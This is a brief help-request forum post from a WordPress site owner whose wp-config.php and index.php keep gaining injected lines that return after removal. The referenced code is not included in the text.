Hack / script problem

Hello dear WP community

I have a problem with my website. For some reason, my wp-config.php and index.php are getting additional lines in code that are causing some issues. These lines are in the paragraph under. And it creates file on that location. Ddo you know how to fix it? Or where to look at. I can delete them from the file, but they will reappear in a day or two.
